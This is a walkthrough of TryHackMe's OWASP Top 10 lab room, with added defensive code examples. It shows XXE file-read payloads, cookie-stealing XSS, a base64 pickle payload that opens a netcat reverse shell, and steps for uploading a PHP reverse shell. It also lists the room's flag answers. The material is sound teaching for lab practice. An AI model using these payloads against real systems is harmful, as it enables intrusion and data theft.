Tryhackme - OWASP Top 10

In this walkthrough, we will be going through the OWASP Top 10 room from Tryhackme. The room is designed to teach the OWASP Top 10 vulnerabilities and critical web security risks, and how each of them is exploited, in detail. So, let's get started without delay.

Table of Contents

Task 1 – Introduction

  • Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entity
  • Broken Access Control
  • Security Misconfiguration
  • Cross-site Scripting
  • Insecure Deserialization
  • Components with Known Vulnerabilities
  • Insufficient Logging & Monitoring

Task 2 – Accessing machines


Task 3 – [Severity 1] Injection

Question 1 – I’ve understood Injection attacks.

Done

Task 4 – [Severity 1] OS Command Injection

Question 1 – I’ve understood command injection.

Done

Task 5 – [Severity 1] Command Injection Practical

Question 1 – What strange text file is in the website root directory?

ls
drpepper.txt 

Question 2 – How many non-root/non-service/non-daemon users are there?

cat /etc/passwd
0

Question 3 – What user is this app running as?

id
www-data

Question 4 – What is the user’s shell set as?

cat /etc/passwd | grep www-data
/usr/sbin/nologin 

Question 5 – What version of Ubuntu is running?

lsb_release -a
18.04.4

Question 6 – Print out the MOTD.  What favorite beverage is shown?

cat drpepper.txt
Dr Pepper
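The practical above works because the web app pastes whatever is typed into the form straight into a shell command. As an added example (not the room's code; the ping feature, the allowlist pattern and the function names are assumptions), this contrasts that shape of bug with the defensive pattern: validate the single argument against an allowlist, then hand an argv list to the process with no shell in between.

```python
import re
import subprocess

# Allowlist for the one argument the feature takes: an IPv4 address or a DNS
# hostname. Shell metacharacters, spaces and a leading '-' never match, so neither
# command injection nor option injection can reach the command line.
HOST_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)$"
)


def is_valid_host(host: str) -> bool:
    return HOST_RE.fullmatch(host) is not None


def vulnerable_command(host: str) -> str:
    """Constructed model of the bug class from Task 5: user input concatenated
    into a shell command string. Returned, not executed, so it can be inspected."""
    return "ping -c 1 " + host


def build_ping_argv(host: str) -> list:
    """Validate first, then build an argv list; no shell ever sees ';' or '|'."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False (the default): the argv list goes straight to execve.
    return subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for candidate in ("10.10.10.10", "example.com", "10.10.10.10; cat /etc/passwd"):
        print(candidate, "->", "accepted" if is_valid_host(candidate) else "rejected")
```

The allowlist is the real control; argv-without-shell only stops shell metacharacters, and a host beginning with "-" would still be parsed as an option by ping, which is why the pattern also forbids a leading hyphen.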

Task 6 – [Severity 2] Broken Authentication

Question 1 – I’ve understood broken authentication mechanisms.

Done

Task 7 – [Severity 2] Broken Authentication Practical

Try to register the user name darren; you will see that the user already exists. Then try to register " darren" (with a leading space). You will now be logged in and able to see the content that should only be visible in Darren's account, which in our case is the flag you need to retrieve.

Login Panel
Register
Error: This user is already registered
Register

Question 1 – What is the flag that you found in darren’s account?

Darren flag
fe86079416a21a3c99937fea8874b667

Question 2 – Now try to do the same trick and see if you can login as arthur.

Done
Register

Question 3 – What is the flag that you found in arthur’s account?

Arthur Flag
d9ac0f7db4fda460ac3edeb75d75e16e
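The trick with " darren" works because the app compares the raw string at registration but trims it when it loads the account's content, so two code paths disagree about which account you are. Below is an added example (not the room's code; the two store classes and their method names are assumptions) that models that mismatch next to the fix: canonicalise the username once and use the canonical form everywhere.

```python
import unicodedata


class DuplicateUser(ValueError):
    pass


def canonical_username(raw: str) -> str:
    """One normal form for account names: Unicode NFKC, case-folded, outer
    whitespace removed and inner runs collapsed, so ' darren', 'DARREN' and
    'darren' all name the same account."""
    name = unicodedata.normalize("NFKC", raw).casefold()
    name = " ".join(name.split())
    if not name:
        raise ValueError("empty username")
    return name


class VulnerableUserStore:
    """Constructed model of the Task 7 bug: registration keys on the raw string,
    but profile loading trims it, so ' darren' registers as a new account and
    then reads darren's data."""

    def __init__(self):
        self._profiles = {}

    def register(self, raw: str, profile: dict) -> None:
        if raw in self._profiles:
            raise DuplicateUser(raw)
        self._profiles[raw] = profile

    def load_profile(self, raw: str):
        return self._profiles.get(raw.strip())


class HardenedUserStore:
    """Every entry point goes through canonical_username, so there is no second
    spelling of an existing account left to register."""

    def __init__(self):
        self._profiles = {}

    def register(self, raw: str, profile: dict) -> str:
        key = canonical_username(raw)
        if key in self._profiles:
            raise DuplicateUser(f"{raw!r} collides with existing account {key!r}")
        self._profiles[key] = profile
        return key

    def load_profile(self, raw: str):
        return self._profiles.get(canonical_username(raw))
```

Normalising at the database boundary (a unique index on the canonical column) rather than only in application code closes the same gap for every future code path.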

Task 8 – [Severity 3] Sensitive Data Exposure (Introduction)


Task 9 – [Severity 3] Sensitive Data Exposure (Supporting Material 1)

Question 1 – Read and understand the supporting material on SQLite Databases.

Done

Task 10 – [Severity 3] Sensitive Data Exposure (Supporting Material 2)

Question 1 – Read the supporting material about cracking hashes.

Done

Task 11 – [Severity 3] Sensitive Data Exposure (Challenge)

Question 1 – What is the name of the mentioned directory?

Login
Page Source code
/assets

Question 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Index of /assets
webapp.db

Question 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?

sqlite3 webapp.db
6eea9b7ef19179a06954edd0f6c05ceb

Question 4 – What is the admin’s plaintext password?

Crackstation
qwertyuiop

Question 5 – Login as the admin. What is the flag?

Username: admin
Password: qwertyuiop

Flag
THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 12 – [Severity 4] XML External Entity

Question 1 – Deploy the machine attached to the task.

Done

Task 13 – [Severity 4] XML External Entity – eXtensible Markup Language

Question 1 – Full form of XML

Extensible Markup Language

Question 2 – Is it compulsory to have XML prolog in XML documents?

No

Question 3 – Can we validate XML documents against a schema?

Yes

Question 4 – How can we specify XML version and encoding in XML document?

xml prolog

Task 14 – [Severity 4] XML External Entity – DTD

Question 1 – How do you define a new ELEMENT?

!ELEMENT

Question 2 – How do you define a ROOT element?

!DOCTYPE

Question 3 – How do you define a new ENTITY?

!ENTITY

Task 15 – [Severity 4] XML External Entity – XXE Payload

Question 1 – Try the payload mentioned in description on the website.

Done
Payload - `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>   <root>&read;</root>`
XXE Attack
/etc/passwd

Task 16 – [Severity 4] XML External Entity – Exploiting

Question 1 – Try to display your own name using any payload.

Done
Payload: <?xml version="1.0"?><!DOCTYPE Tryhackme [<!ENTITY name "funkt10n"> ]>
 <userInfo>
  <firstName>null</firstName>
  <lastName>&name;</lastName>
 </userInfo>
XXE Attack

Question 2 – See if you can read the /etc/passwd

Done
Payload: `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>   <root>&read;</root>`
XXE Attack
cat /etc/passwd

Question 3 – What is the name of the user in /etc/passwd

cat /etc/passwd
falcon

Question 4 – Where is falcon’s SSH key located?

/home/falcon/.ssh/id_rsa

Question 5 – What are the first 18 characters for falcon’s private key

Payload: `<?xml version="1.0"?>   <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]>   <root>&read;</root>`
XXE Attack
RSA Private Key
MIIEogIBAAKCAQEA7b
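Every payload in Tasks 15 and 16 needs a DOCTYPE with an external entity, and a service that accepts XML from users almost never needs either. The added example below (not the room's code; the request-body samples and function names are assumptions) classifies incoming bodies for logging and refuses any document carrying a DOCTYPE before it reaches the parser.

```python
import re
from xml.etree import ElementTree as ET

# Constructed samples: the room's external-entity payload and a benign document
# of the shape the lab's form submits.
XXE_BODY = (
    '<?xml version="1.0"?>'
    "<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>"
    "<root>&read;</root>"
)
BENIGN_BODY = (
    '<?xml version="1.0"?>'
    "<userInfo><firstName>null</firstName><lastName>alice</lastName></userInfo>"
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
EXTERNAL_RE = re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def classify_xml(body: str) -> str:
    """Telemetry label for a request body: 'external-entity' covers the file-read
    payloads above, 'internal-entity' covers entity-expansion (billion laughs) style
    documents, 'doctype' anything else with a DTD, 'clean' the rest."""
    if EXTERNAL_RE.search(body):
        return "external-entity"
    if ENTITY_RE.search(body):
        return "internal-entity"
    if DOCTYPE_RE.search(body):
        return "doctype"
    return "clean"


def parse_untrusted_xml(body: str) -> ET.Element:
    """Reject any DTD outright; the application schema has no use for one."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DOCTYPE declarations are not accepted from clients")
    return ET.fromstring(body)


def last_name_from_request(body: str) -> str:
    node = parse_untrusted_xml(body).find("lastName")
    return node.text if node is not None else ""
```

Run the check on decoded text, not raw bytes, so a UTF-16 body cannot slip past the regex; and treat it as a second layer over a parser configured to not resolve entities (for example defusedxml, or lxml's XMLParser with resolve_entities=False), not as the only defence. The classify label is also what you would want in the access log to spot probing like the /etc/passwd attempt above.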

Task 17 – [Severity 5] Broken Access Control

Question 1 – Read and understand how broken access control works.

Done

Task 18 – [Severity 5] Broken Access Control (IDOR Challenge)

Question 1 – Read and understand how IDOR works.

Done

Question 2 – Deploy the machine and go to http://10.10.106.96 – Login with the username being noot and the password test1234.

Done
Note Viewer!
I am noot!

Question 3 – Look at other users notes. What is the flag?

flag
flag{fivefourthree}

Task 19 – [Severity 6] Security Misconfiguration

Question 1 – Deploy the VM

Done

Question 2 – Hack into the webapp, and find the flag!

Pensive Noes login

Default credentials found on: https://github.com/NinjaJc01/PensiveNotes

Pensive Notes github
Pensive Notes

Task 20 – [Severity 7] Cross-site Scripting

Question 1 – Deploy the VM

Done

Question 2 – Navigate to http://10.10.192.244/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

Payload: <script>alert("Hello")</script>
Reflective XSS
Questions
Hello
flag
ThereIsMoreToXSSThanYouThink

Question 3 – On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

Payload: <script>alert(window.location.hostname)</script>
Reflective XSS
flag
ReflectiveXss4TheWin

Question 4 – Now navigate to http://10.10.192.244/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.

Register with a test user first and then type the following comment as payload.

  • Payload: Hello Friend!
Stored XSS
Add a comment
Comments
HTML_T4gs

Question 4 – On the same page, create an alert popup box appear on the page with your document cookies.

Payload: <script>alert(document.cookie)</script>
Add a comment
Cookie
flag
W3LL_D0N3_LVL2

Question 5 – Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

Payload: <script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
Add a comment
Stored XSS
Flag
websites_can_be_easily_defaced_with_xss
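All three stored-XSS payloads above land because the comment text is written into the page as HTML rather than as text. As an added example (not the room's code; the render functions and the review heuristic are assumptions), this shows the vulnerable interpolation next to context-aware output encoding, plus a cheap flag for comments that contain markup so they can be logged or queued for review.

```python
import html
import re


def render_comment_vulnerable(comment: str) -> str:
    """Constructed model of the lab's bug: raw comment text interpolated into HTML."""
    return '<div class="comment">' + comment + "</div>"


def render_comment(comment: str) -> str:
    """HTML body context: &, <, >, \" and ' become entities, so a <script> tag is
    displayed as text and never parsed as markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_title(title: str) -> str:
    """Attribute context: always quote the attribute and escape quotes inside it;
    the same value is escaped again for the element body."""
    safe = html.escape(title, quote=True)
    return '<h1 id="thm-title" title="' + safe + '">' + safe + "</h1>"


MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def flag_for_review(comment: str) -> bool:
    """Telemetry only: comments containing tags or event handlers are worth a log
    line or a moderation queue. Encoding, not this check, is the control."""
    return MARKUP_RE.search(comment) is not None
```

Encoding is per context: the body rule above is wrong inside a JavaScript string or a URL, which is why template engines expose separate escapers and why default auto-escaping should stay on.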

Task 21 – [Severity 8] Insecure Deserialization

Question 1 – Who developed the Tomcat application?

The Apache Software Foundation

Question 2 – What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service

Task 22 – [Severity 8] Insecure Deserialization – Objects

Question 1 – Select the correct term of the following statement:

If a dog was sleeping, would this be:

A) A State
B) A Behaviour

A Behaviour

Task 23 – [Severity 8] Insecure Deserialization – Deserialization

Question 1 – What is the name of the base-2 formatting that data is sent across a network as?

Binary

Task 24 – [Severity 8] Insecure Deserialization – Cookies

Question 1 – If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login

Question 2 – What is the acronym for the web technology that Secure cookies work over?

HTTPS

Task 25 – [Severity 8] Insecure Deserialization – Cookies Practical

Question 1 – 1st flag (cookie value)

Sign up
Your Profile
Dev tools cookie value
Session ID - "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAY2VkZDI2OTYxMTNlNDBlNGIxZTMzYjE5ODg5MmYwY2NxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="

Decode with: base64decode.org

Decode Base64
THM{good_old_base64_huh}
THM{good_old_base64_huh}

Question 2 – 2nd flag (admin dashboard)

Modifying Cookie Values

Notice here that you have a cookie named “userType”. You are currently a user, as confirmed by your information on the “myprofile” page.

This application determines what you can and cannot see by your userType. What if you wanted to become an admin?

Double left-click the “Value” column of “userType” to modify the contents. Let’s change our userType to “admin” and navigate to http://10.10.13.24/admin to answer the second flag.

Dev Tools cookie value
userType

Go to page: http://10.10.13.24/admin

Your Admin Dashboard
THM{heres_the_admin_flag} 

Task 26 – [Severity 8] Insecure Deserialization – Code Execution

Question 1 – flag.txt

gedit pickleme.py
pickleme.py
python3 pickleme.py
Session ID - gASVdgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFtybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMTA3LjE2NyA0NDQ0ID4gL3RtcC9mlIWUUpQu
netcat listener
dev tools cookie value
encodedPayload
  • Click on Feedback link and you will get a reverse shell.
netcat listener
flag.txt
4a69a7ff9fd68
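Tasks 25 and 26 are two consequences of one design: the session cookie is trusted client-side state, and it is a pickle, so editing it changes authorisation and a crafted one runs code during unpickling. The added example below (not the room's code; the key, cookie format and function names are assumptions) serves both: a data-only JSON cookie with an HMAC so edits in DevTools are detected, and a restricted unpickler for code that cannot drop pickle yet.

```python
import base64
import datetime
import hashlib
import hmac
import io
import json
import pickle

# Constructed server-side secret; a real deployment loads it from configuration.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"


def issue_cookie(session: dict, key: bytes = SECRET_KEY) -> str:
    """JSON (data only, never code) plus HMAC-SHA256 over the encoded payload."""
    payload = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    sig = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + sig


def read_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the session dict, or None if the cookie is malformed or was edited."""
    try:
        payload, sig = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


def edit_cookie_client_side(cookie: str, **changes) -> str:
    """Model of the Task 25 step: change a field in the browser, old signature kept."""
    payload, sig = cookie.rsplit(".", 1)
    data = json.loads(base64.urlsafe_b64decode(payload))
    data.update(changes)
    new_payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    return new_payload + "." + sig


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup: plain containers, strings and numbers still load,
    but any pickle that references a module function is rejected before it runs."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def plain_data_round_trip() -> dict:
    """A dict of strings has no global references, so it loads unchanged."""
    return restricted_loads(pickle.dumps({"sessionId": "cedd2696", "userType": "user"}))


def rejects_foreign_global() -> bool:
    """A harmless pickle that references datetime.date is enough to trip the guard."""
    try:
        restricted_loads(pickle.dumps(datetime.date(2020, 1, 1)))
    except pickle.UnpicklingError:
        return True
    return False
```

The signed cookie still reveals its contents to the user (it is encoded, not encrypted), so keep secrets out of it or use a server-side session store keyed by a random ID; the signature only guarantees the server sees what it issued.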

Task 27 – [Severity 9] Components With Known Vulnerabilities – Intro

Question 1 – Read above.

Done

Task 28 – [Severity 9] Components With Known Vulnerabilities – Exploit

Question 1 – Read the above!

Done

Task 29 – [Severity 9] Components With Known Vulnerabilities – Lab

Question 1 – How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Welcome to online CSE bookstore
  • We have an application named CSE Bookstore. In the bottom right corner there is an admin login with a 2017 date, which hints at how old the deployed version is.
  • Search Google for an exploit related to CSE Bookstore 2017.
cse bookstore 2017 exploit
Online Book Store 1.0 - Unauthenticated RCE
  • Download the exploit.
  • Run the exploit: python3 47887.py http://10.10.162.73/
RCE

Another method for exploiting

  • Go to admin login page
  • Try default credentials: admin:admin
  • You will be logged into the admin panel
Add new book
  • Click on Edit
  • Click on Browse and upload a reverse PHP shell to the server.
  • Click Confirm
Uploading reverse shell
Uploading the Book
  • Now setup a netcat listener on the specified port.
netcat listening
  • We have uploaded the reverse shell to the directory where the product images are stored. Right-click on any product image and open it in a new tab; you will get the following path:

http://10.10.162.73/bootstrap/img/

executing the payload
  • Now trigger the reverse shell by visiting http://10.10.162.73/bootstrap/img/rev.php. You should get a connection back.
netcat listener
  • We have successfully pwned the system once more.
1611
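The second method works only because the book-cover upload accepts a .php file and stores it under a web-served directory where the server executes scripts. As an added example (not the bookstore's code; the signature table, name pattern and function names are assumptions), this is the validation an upload handler for product images should do: allowlist the extension, check the file content matches it, and reject names with extra dots or path components.

```python
import os
import re

# Magic bytes for the only types a product-image upload should accept (constructed allowlist).
IMAGE_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Constructed sample contents: a minimal PNG header and a non-image file.
FAKE_PNG = IMAGE_SIGNATURES[".png"] + b"\x00" * 16
NOT_AN_IMAGE = b"<?php /* constructed placeholder, no code */ ?>"


class UploadRejected(ValueError):
    pass


def validate_image_upload(filename: str, data: bytes) -> str:
    """Return the name to store under, or raise UploadRejected.

    Order matters: strip any path first, then check the extension, then the
    stem (no dots, so 'rev.php.png' cannot sneak a second extension in), and
    finally the content signature."""
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not STEM_RE.fullmatch(stem):
        raise UploadRejected("file name must be a single alphanumeric label")
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        raise UploadRejected("content does not match the declared image type")
    return stem + ext


def is_accepted(filename: str, data: bytes) -> bool:
    try:
        validate_image_upload(filename, data)
        return True
    except UploadRejected:
        return False
```

Even with this check in place, store uploads outside the document root (or in a directory the web server is configured to serve as static files only), and give them a server-generated name rather than the one the client supplied.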

Task 30 – [Severity 10] Insufficient Logging and Monitoring

cat login-logs.txt

Question 1 – What IP address is the attacker using?

49.99.13.16

Question 2 – What kind of attack is being carried out?

Brute Force 
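Reading login-logs.txt by eye is fine for a handful of lines; the point of the task is that the pattern (one source address, many failed logins against many usernames in a short window) should be detected automatically. The added example below (not the room's code; the log format, the sample lines and the thresholds are constructed) parses such a log and raises an alert when one IP exceeds a failure count inside a sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the spirit of the room's login-logs.txt (not the real file):
# "<timestamp> <http status> <source ip> <username>", one login attempt per line.
SAMPLE_LOG = """\
2019-03-12T09:21:17 200 12.55.22.88 jr22
2019-03-12T09:21:18 401 49.99.13.16 admin
2019-03-12T09:21:18 401 49.99.13.16 administrator
2019-03-12T09:21:19 401 49.99.13.16 anonymous
2019-03-12T09:21:19 401 49.99.13.16 root
2019-03-12T09:21:20 401 49.99.13.16 admin
2019-03-12T09:22:05 401 10.10.14.3 ftaylor
2019-03-12T09:22:11 200 10.10.14.3 ftaylor
this line is malformed and is skipped
"""

LINE_RE = re.compile(r"^(\S+) (\d{3}) (\d{1,3}(?:\.\d{1,3}){3}) (\S+)$")


def parse_log(text: str) -> list:
    """Return (timestamp, status, ip, username) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, status, ip, user = m.groups()
        events.append((datetime.fromisoformat(ts), int(status), ip, user))
    return events


def detect_bruteforce(events: list, threshold: int = 4, window: timedelta = timedelta(seconds=60)) -> list:
    """Alert on the first moment an IP reaches `threshold` failed logins within `window`.
    One failed login from a legitimate user followed by success never trips it."""
    failures = defaultdict(list)
    for ts, status, ip, user in events:
        if status == 401:
            failures[ip].append((ts, user))
    alerts = []
    for ip, attempts in failures.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                users = sorted({u for _, u in attempts[start:end + 1]})
                alerts.append({"ip": ip, "failures": end - start + 1, "usernames": users})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_log(SAMPLE_LOG)):
        print(f"brute force from {alert['ip']}: {alert['failures']} failures against {alert['usernames']}")
```

The distinct-username list is what separates password guessing against many accounts (this log) from one user mistyping their own password, and it is the detail worth carrying into the alert.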

Task 31 – What Next?


So that was "OWASP Top 10" for you. In this room, we covered the OWASP Top 10 web application vulnerabilities and their exploitation: Injection (which includes SQLi and more), then a dive into Broken Authentication, and moving on, XSS, XXE, IDOR, Insecure Deserialization, Insufficient Logging, components with known vulnerabilities and much more. The room is certainly lengthy, but it covers the OWASP Top 10 risks and vulnerabilities in great detail. On that note, I will take my leave and meet you in the next one. Till then, "Keep Hacking".
